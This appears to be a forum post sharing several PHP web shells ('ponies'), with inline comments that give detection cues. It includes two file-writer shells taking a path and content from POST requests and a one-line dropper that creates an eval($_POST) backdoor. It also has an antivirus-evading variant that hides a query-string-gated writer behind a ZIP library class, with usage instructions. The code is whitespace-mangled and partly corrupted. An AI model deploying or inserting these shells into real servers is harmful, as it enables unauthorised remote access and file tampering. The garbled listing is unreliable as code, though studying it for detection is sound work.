Author: spider
Here is another very small PHP "pony": a minimal web shell whose only job is to write a file onto the server.
<? Php
// Sample 1: a file-writing web shell. The listing is whitespace-mangled by
// extraction (for example "$ _ POST") and is annotated as printed, not corrected.
Header ("content-Type: text/html; charset = gb2312 ");
// When magic quotes are on, every POST value is passed through stripslashes(),
// presumably so the submitted file body is written back without added slashes.
// get_magic_quotes_gpc() was removed in PHP 8.0, which dates the sample to
// older PHP installations.
If (get_magic_quotes_gpc () foreach ($ _ POST as $ k => $ v) $ _ POST [$ k] = stripslashes ($ v );
?>
<Form method = "POST">
Save file name: <input type = "text" name = "file" size = "60" value = "<? Echo str_replace ('\', '/' ,__ FILE _)?> ">
<Br>
<Textarea name = "text" COLS = "70" ROWS = "18"> </textarea>
<Br>
<Input type = "submit" name = "submit" value = "save">
<Form>
<? Php
// Core of the shell: the destination path ($_POST['file']) and the content
// ($_POST['text']) both come straight from the request. No authentication,
// path restriction or extension check appears anywhere in this listing.
// Detection cues: fopen()/fwrite() fed directly from $_POST, blanket "@" error
// suppression, and a form whose path field is pre-filled from __FILE__.
If (isset ($ _ POST ['file'])
{
$ Fp = @ fopen ($ _ POST ['file'], 'wb ');
Echo @ fwrite ($ fp, $ _ POST ['text'])? 'Saved successfully! ':' Saving failed! ';
@ Fclose ($ fp );
}
?>
I read a PHP tutorial last night and found that PHP is really powerful! Along the way I wrote a PHP pony.
The code is pasted below.
<Html>
<Title> By: SinCoder </title>
<Font color = red size = 6> php pony By: SinCoder </br> </font>
<? Echo "</br> path of the program:". _ FILE __.
"</Br> server operating system:". PHP_ OS.
"</Br> server ip Address:". gethostbyname ($ _ SERVER ["SERVER_NAME"]).
"</Br> PHP version:". PHP_VERSION;
// Sample 2 banner: the echo above reports the script path, server OS, resolved
// server IP and PHP version to whoever loads the page. The fixed
// "php pony By: SinCoder" title and banner text is a usable content signature.
?>
<Form action = <? Echo strrchr (_ FILE __, "\");?> Method = "post">
Data to be submitted: </br>
<Textarea type = "text" name = "data" rows = "10" cols = "30">
</Textarea>
</Br>
Save path: <input type = "text" name = "dir"/>
</Br>
<Input type = "submit" value = "submit"/>
</Form>
</Html>
<?
// Write handler: exits unless both "data" and "dir" were POSTed, then opens the
// path named by $_POST["dir"] and writes $_POST["data"] into it. No
// authentication or path restriction appears in the listing.
If (! (Isset ($ _ POST ["data"]) & isset ($ _ POST ["dir"])
Exit ();
If (strlen ($ _ POST ["data"])> 0 & strlen ($ _ POST ["dir"])> 0)
{
// NOTE(review): the fopen() mode string is empty as printed, presumably lost in
// extraction; confirm against an original copy before writing signatures.
$ P_File = fopen ($ _ POST ["dir"], "");
If (! $ P_File)
Echo "Write failed! Try another directory! ";
Else
Echo "OK !! ";
Fputs ($ p_File, $ _ POST ["data"]);
Fclose ($ p_File );
}
Else
Echo "complete the data! ";
?>
Php: A pony Backdoor
<?
// Dropper: when requested, this line is meant to write a second file, jb51.php,
// whose whole body is an eval() of the POST parameter "jb51". Hunting cues: a
// write call whose payload string itself contains a PHP open tag and an eval of
// $_POST, and a new .php file appearing in the same directory afterwards.
Fputs (fopen (jb51.php, w), <? Eval ($ _ POST [jb51]);?>)?>
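When this file is requested, jb51.php is created in the current directory with the content <? Eval ($ _ POST [jb51]);?> and the "password" is jb51. That password is only the name of the POST parameter whose value is handed to eval(), so it provides no real access control; where request bodies are captured, a POST carrying that parameter to the generated file is a strong indicator.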
The latest "no-kill" (antivirus-evading) PHP pony
<? Php
// Sample 4, part 1: a ZIP read/write helper class. Nothing inside the class reads
// request input; in this listing it apparently serves as cover for the
// request-gated file writer that follows the class's closing brace. Extraction
// has mangled spacing and some literals (see the unpack() format strings and the
// ".gz" paths in ExtractFile), so the text is annotated as printed, not corrected.
Class zip
{
Var $ datasec, $ ctrl_dir = array ();
Var $ eof_ctrl_dir = "\ x50 \ x4b \ x05 \ x06 \ x00 \ x00 \ x00 \ x00 ";
Var $ old_offset = 0; var $ dirs = Array (".");
Function get_List ($ zip_name)
{
$ Ret = '';
$ Zip = @ fopen ($ zip_name, 'rb ');
If (! $ Zip) return (0 );
$ Centd = $ this-> ReadCentralDir ($ zip, $ zip_name );
@ Rewind ($ zip );
@ Fseek ($ zip, $ centd ['offset']);
For ($ I = 0; $ I <$ centd ['entries']; $ I ++)
{
$ Header = $ this-> ReadCentralFileHeaders ($ zip );
$ Header ['index'] = $ I; $ info ['filename'] = $ header ['filename'];
$ Info ['stored _ filename'] = $ header ['stored _ filename'];
$ Info ['SIZE'] = $ header ['SIZE']; $ info ['compressed _ size'] = $ header ['compressed _ size'];
$ Info ['crc '] = strtoupper (dechex ($ header ['crc']);
$ Info ['mtime'] = $ header ['mtime']; $ info ['comment'] = $ header ['comment'];
$ Info ['folder'] = ($ header ['external '] = 0x41FF0010 | $ header ['external'] = 16 )? 1:0;
$ Info ['index'] = $ header ['index']; $ info ['status'] = $ header ['status'];
$ Ret [] = $ info; unset ($ header );
}
Return $ ret;
}
Function Add ($ files, $ compact)
{
If (! Is_array ($ files [0]) $ files = Array ($ files );
For ($ I = 0; $ files [$ I]; $ I ++ ){
$ Fn = $ files [$ I];
If (! In_Array (dirname ($ fn [0]), $ this-> dirs ))
$ This-> add_Dir (dirname ($ fn [0]);
If (basename ($ fn [0])
$ Ret [basename ($ fn [0])] = $ this-> add_File ($ fn [1], $ fn [0], $ compact );
}
Return $ ret;
}
Function get_file ()
{
$ Data = implode ('', $ this-> datasec );
$ Ctrldir = implode ('', $ this-> ctrl_dir );
Return $ data. $ ctrldir. $ this-> eof_ctrl_dir.
Pack ('V', sizeof ($ this-> ctrl_dir). pack ('V', sizeof ($ this-> ctrl_dir )).
Pack ('V', strlen ($ ctrldir). pack ('V', strlen ($ data). "\ x00 \ x00 ";
}
Function add_dir ($ name)
{
$ Name = str_replace ("\", "/", $ name );
$ Fr = "\ x50 \ x4b \ x03 \ x04 \ x0a \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ";
$ Fr. = pack ("V", 0 ). pack ("V", 0 ). pack ("V", 0 ). pack ("v", strlen ($ name ));
$ Fr. = pack ("v", 0 ). $ name. pack ("V", 0 ). pack ("V", 0 ). pack ("V", 0 );
$ This-> datasec [] = $ fr;
$ New_offset = strlen (implode ("", $ this-> datasec ));
$ Cdrec = "\ x50 \ x4b \ x01 \ x02 \ x00 \ x00 \ x0a \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ";
$ Cdrec. = pack ("V", 0 ). pack ("V", 0 ). pack ("V", 0 ). pack ("v", strlen ($ name ));
$ Cdrec. = pack ("v", 0). pack ("v", 0). pack ("v", 0). pack ("v", 0 );
$ Ext = "\ xff ";
$ Cdrec. = pack ("V", 16). pack ("V", $ this-> old_offset). $ name;
$ This-> ctrl_dir [] = $ cdrec;
$ This-> old_offset = $ new_offset;
$ This-> dirs [] = $ name;
}
Function add_File ($ data, $ name, $ compact = 1)
{
$ Name = str_replace ('\', '/', $ name );
$ Dtime = dechex ($ this-> DosTime ());
$ Hexdtime = '\ x'. $ dtime [6]. $ dtime [7].' \ x'. $ dtime [4]. $ dtime [5]
. '\ X'. $ dtime [2]. $ dtime [3].' \ x'. $ dtime [0]. $ dtime [1];
// eval() here only turns the "\xNN" text built above into raw bytes for the DOS
// timestamp; its input comes from DosTime(), not from the request. It still
// means a bare "contains eval" rule fires on the library part of this file,
// so triage should look at what feeds the call rather than at the keyword alone.
Eval ('$ hexdtime = "'. $ hexdtime .'";');
If ($ compact)
$ Fr = "\ x50 \ x4b \ x03 \ x04 \ x14 \ x00 \ x00 \ x00 \ x08 \ x00". $ hexdtime;
Else $ fr = "\ x50 \ x4b \ x03 \ x04 \ x0a \ x00 \ x00 \ x00 \ x00 \ x00". $ hexdtime;
$ Unc_len = strlen ($ data); $ crc = crc32 ($ data );
If ($ compact ){
$ Zdata = gzcompress ($ data); $ c_len = strlen ($ zdata );
$ Zdata = substr ($ zdata, 0, strlen ($ zdata)-4), 2 );
} Else {
$ Zdata = $ data;
}
$ C_len = strlen ($ zdata );
$ Fr. = pack ('V', $ crc). pack ('V', $ c_len). pack ('V', $ unc_len );
$ Fr. = pack ('V', strlen ($ name). pack ('V', 0). $ name. $ zdata;
$ Fr. = pack ('V', $ crc). pack ('V', $ c_len). pack ('V', $ unc_len );
$ This-> datasec [] = $ fr;
$ New_offset = strlen (implode ('', $ this-> datasec ));
If ($ compact)
$ Cdrec = "\ x50 \ x4b \ x01 \ x02 \ x00 \ x00 \ x14 \ x00 \ x00 \ x00 \ x08 \ x00 ";
Else $ cdrec = "\ x50 \ x4b \ x01 \ x02 \ x14 \ x00 \ x0a \ x00 \ x00 \ x00 \ x00 \ x00 ";
$ Cdrec. = $ hexdtime. pack ('V', $ crc). pack ('V', $ c_len). pack ('V', $ unc_len );
$ Cdrec. = pack ('V', strlen ($ name). pack ('V', 0). pack ('V', 0 );
$ Cdrec. = pack ('V', 0). pack ('V', 0). pack ('V', 32 );
$ Cdrec. = pack ('V', $ this-> old_offset );
$ This-> old_offset = $ new_offset;
$ Cdrec. = $ name;
$ This-> ctrl_dir [] = $ cdrec;
Return true;
}
Function DosTime (){
$ Timearray = getdate ();
If ($ timearray ['Year'] <1980 ){
$ Timearray ['Year'] = 1980; $ timearray ['mon'] = 1;
$ Timearray ['mday'] = 1; $ timearray ['hours'] = 0;
$ Timearray ['minutes '] = 0; $ timearray ['seconds'] = 0;
}
Return ($ timearray ['Year']-1980) <25) | ($ timearray ['mon'] <21) | ($ timearray ['mday'] <16) | ($ timearray ['hours'] <11) |
($ Timearray ['minutes '] <5) | ($ timearray ['seconds']> 1 );
}
// Decompress the entire compressed package
// Directly using Extract will cause a path problem. This function first obtains the file information from the list and creates all directories before running Extract.
Function ExtractAll ($ zn, $)
{
If (substr ($ to,-1 )! = "/") $ To. = "/";
$ Files = $ this-> get_List ($ zn );
$ Cn = count ($ files );
If (is_array ($ files ))
{
For ($ I = 0; $ I <$ cn; $ I ++)
{
If ($ files [$ I] ['folder'] = 1 ){
@ Mkdir ($ to. $ files [$ I] ['filename'], $ GLOBALS ['cfg _ dir_purview']);
@ Chmod ($ to. $ files [$ I] ['filename'], $ GLOBALS ['cfg _ dir_purview']);
}
}
}
$ This-> Extract ($ zn, $ );
}
Function Extract ($ zn, $ to, $ index = Array (-1 ))
{
$ OK = 0; $ zip = @ fopen ($ zn, 'rb ');
If (! $ Zip) return (-1 );
$ Cdir = $ this-> ReadCentralDir ($ zip, $ zn );
$ Pos_entry = $ cdir ['offset'];
If (! Is_array ($ index) {$ index = array ($ index );}
For ($ I = 0; isset ($ index [$ I]); $ I ++ ){
If (intval ($ index [$ I])! = $ Index [$ I] | $ index [$ I]> $ cdir ['entries'])
Return (-1 );
}
For ($ I = 0; $ I <$ cdir ['entries']; $ I ++)
{
@ Fseek ($ zip, $ pos_entry );
$ Header = $ this-> ReadCentralFileHeaders ($ zip );
$ Header ['index'] = $ I; $ pos_entry = ftell ($ zip );
@ Rewind ($ zip); fseek ($ zip, $ header ['offset']);
If (in_array ("-1", $ index) | in_array ($ I, $ index ))
$ Stat [$ header ['filename'] = $ this-> ExtractFile ($ header, $ to, $ zip );
}
Fclose ($ zip );
Return $ stat;
}
Function ReadFileHeader ($ zip)
{
$ Binary_data = fread ($ zip, 30 );
$ Data = unpack ('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len ', $ binary_data );
$ Header ['filename'] = fread ($ zip, $ data ['filename _ len']);
If ($ data ['extra _ len']! = 0 ){
$ Header ['extra '] = fread ($ zip, $ data ['extra _ len']);
} Else {$ header ['extra '] = '';}
$ Header ['compression'] = $ data ['compression']; $ header ['SIZE'] = $ data ['SIZE'];
$ Header ['compressed _ size'] = $ data ['compressed _ size'];
$ Header ['crc '] = $ data ['crc']; $ header ['flag'] = $ data ['flag'];
$ Header ['mdate'] = $ data ['mdate']; $ header ['mtime'] = $ data ['mtime'];
If ($ header ['mdate'] & $ header ['mtime']) {
$ Hour = ($ header ['mtime'] & 0xF800)> 11; $ minute = ($ header ['mtime'] & 0x07E0)> 5;
$ Seconde = ($ header ['mtime'] & 0x001F) * 2; $ year = ($ header ['mdate'] & 0xFE00)> 9) + 1980;
$ Month = ($ header ['mdate'] & 0x01E0)> 5; $ day = $ header ['mdate'] & 0x001F;
$ Header ['mtime'] = mktime ($ hour, $ minute, $ seconde, $ month, $ day, $ year );
} Else {$ header ['mtime'] = time ();}
$ Header ['stored _ filename'] = $ header ['filename'];
$ Header ['status'] = "OK ";
Return $ header;
}
Function ReadCentralFileHeaders ($ zip ){
$ Binary_data = fread ($ zip, 46 );
$ Header = unpack ('vchkid/vid/vversion/kernel/vflag/vcompression/vmtime/vmdate/Vcrc/kernel/Vsize/kernel/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/ voffset ', $ binary_data );
If ($ header ['filename _ len']! = 0)
$ Header ['filename'] = fread ($ zip, $ header ['filename _ len']);
Else $ header ['filename'] = '';
If ($ header ['extra _ len']! = 0)
$ Header ['extra '] = fread ($ zip, $ header ['extra _ len']);
Else $ header ['extra '] = '';
If ($ header ['comment _ len']! = 0)
$ Header ['comment'] = fread ($ zip, $ header ['comment _ len']);
Else $ header ['comment'] = '';
If ($ header ['mdate'] & $ header ['mtime'])
{
$ Hour = ($ header ['mtime'] & 0xF800)> 11;
$ Minute = ($ header ['mtime'] & 0x07E0)> 5;
$ Seconde = ($ header ['mtime'] & 0x001F) * 2;
$ Year = ($ header ['mdate'] & 0xFE00)> 9) + 1980;
$ Month = ($ header ['mdate'] & 0x01E0)> 5;
$ Day = $ header ['mdate'] & 0x001F;
$ Header ['mtime'] = mktime ($ hour, $ minute, $ seconde, $ month, $ day, $ year );
} Else {
$ Header ['mtime'] = time ();
}
$ Header ['stored _ filename'] = $ header ['filename'];
$ Header ['status'] = 'OK ';
If (substr ($ header ['filename'],-1) = '/')
$ Header ['external '] = 0x41FF0010;
Return $ header;
}
Function ReadCentralDir ($ zip, $ zip_name)
{
$ Size = filesize ($ zip_name );
If ($ size <277) $ maximum_size = $ size;
Else $ maximum_size = 277;
@ Fseek ($ zip, $ size-$ maximum_size );
$ Pos = ftell ($ zip); $ bytes = 0x00000000;
While ($ pos <$ size)
{
$ Byte = @ fread ($ zip, 1); $ bytes = ($ bytes <8) | Ord ($ byte );
If ($ bytes = 0x504b0506) {$ pos ++; break;} $ pos ++;
}
$ Data = @ unpack ('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size ', fread ($ zip, 18 ));
If ($ data ['comment _ size']! = 0) $ centd ['comment'] = fread ($ zip, $ data ['comment _ size']);
Else $ centd ['comment'] = ''; $ centd ['entries'] = $ data ['entries'];
$ Centd ['disk _ entries'] = $ data ['disk _ entries'];
$ Centd ['offset'] = $ data ['offset']; $ centd ['disk _ start'] = $ data ['disk _ start'];
$ Centd ['SIZE'] = $ data ['SIZE']; $ centd ['disk'] = $ data ['disk'];
Return $ centd;
}
Function ExtractFile ($ header, $ to, $ zip)
{
$ Header = $ this-> readfileheader ($ zip );
$ Header ['external'] = (! Isset ($ header ['external'])? 0: $ header ['external']);
If (substr ($ to,-1 )! = "/") $ To. = "/";
If (! @ Is_dir ($ to) @ mkdir ($ to, $ GLOBALS ['cfg _ dir_purview']);
If (! ($ Header ['external '] = 0x41FF0010 )&&! ($ Header ['external '] = 16 ))
{
If ($ header ['compression'] = 0)
{
// The output path is $to concatenated with the filename stored in the archive,
// with no normalisation or "../" check visible here, so archive-supplied names
// are not confined to $to (zip-slip). Safe extractors canonicalise the target
// and verify it stays under the destination directory before opening it.
$ Fp = @ fopen ($ to. $ header ['filename'], 'wb ');
If (! $ Fp) return (-1 );
$ Size = $ header ['compressed _ size'];
While ($ size! = 0)
{
$ Read_size = ($ size <2048? $ Size: 2048 );
$ Buffer = fread ($ zip, $ read_size );
$ Binary_data = pack ('A'. $ read_size, $ buffer );
@ Fwrite ($ fp, $ binary_data, $ read_size );
$ Size-= $ read_size;
}
Fclose ($ fp );
Touch ($ to. $ header ['filename'], $ header ['mtime']);
} Else {
$ Fp = @fopen($to.w.header='filename'{.'.gz ', 'wb ');
If (! $ Fp) return (-1 );
$ Binary_data = pack ('va1a1va1a1 ', 0x8b1f, Chr ($ header ['compression']),
Chr (0x00), time (), Chr (0x00), Chr (3 ));
Fwrite ($ fp, $ binary_data, 10 );
$ Size = $ header ['compressed _ size'];
While ($ size! = 0)
{
$ Read_size = ($ size <1024? $ Size: 1024 );
$ Buffer = fread ($ zip, $ read_size );
$ Binary_data = pack ('A'. $ read_size, $ buffer );
@ Fwrite ($ fp, $ binary_data, $ read_size );
$ Size-= $ read_size;
}
$ Binary_data = pack ('vv ', $ header ['crc'], $ header ['SIZE']);
Fwrite ($ fp, $ binary_data, 8); fclose ($ fp );
$ Gzp = @gzopen({to.w.header='filename'{.'.gz ', 'rb') or die ("Cette archive est compress ");
If (! $ Gzp) return (-2 );
$ Fp = @ fopen ($ to. $ header ['filename'], 'wb ');
If (! $ Fp) return (-1 );
$ Size = $ header ['SIZE'];
While ($ size! = 0)
{
$ Read_size = ($ size <2048? $ Size: 2048 );
$ Buffer = gzread ($ gzp, $ read_size );
$ Binary_data = pack ('A'. $ read_size, $ buffer );
@ Fwrite ($ fp, $ binary_data, $ read_size );
$ Size-= $ read_size;
}
Fclose ($ fp); gzclose ($ gzp );
Touch ($ to. $ header ['filename'], $ header ['mtime']);
@ Unlink(%to.%header%'filename'%.'.gz ');
}}
Return true;
}
}
// Sample 4, part 2: top-level code appended after the class. The file writer
// below sits entirely inside this branch, so it only runs when the query string
// carries zxzgcn=login; a plain request to the file produces no form. The gate
// is a fixed string in the URL, not authentication, and it is recorded in
// ordinary web-server access logs. Review cue: a "library" file that ends with
// top-level statements reading $_GET/$_POST.
If ($ _ GET ['zxzgcn'] = 'login '){
Header ("content-Type: text/html; charset = gb2312 ");
If (get_magic_quotes_gpc () foreach ($ _ POST as $ k => $ v) $ _ POST [$ k] = stripslashes ($ v );
?>
<Form method = "POST">
Save to: <input type = "text" name = "file" size = "60" value = "<? Echo str_replace ('\', '/' ,__ FILE _)?> ">
<Br>
<Textarea name = "text" COLS = "70" ROWS = "18"> </textarea>
<Br>
<Input type = "submit" name = "submit" value = "save">
<Form>
<? Php
// Write primitive: the path ($_POST['file']) and the content ($_POST['text'])
// both come from the request, with "@" suppressing errors. The misspelled
// status strings echoed below are a usable content signature for this variant.
If (isset ($ _ POST ['file'])
{
$ Fp = @ fopen ($ _ POST ['file'], 'wb ');
Echo @ fwrite ($ fp, $ _ POST ['text'])? 'Succed! ': 'Faled! ';
@ Fclose ($ fp );
}
}
?>
Usage: xxx.php?zxzgcn=login. The trigger travels in the query string, so requests that use it appear in web-server access logs.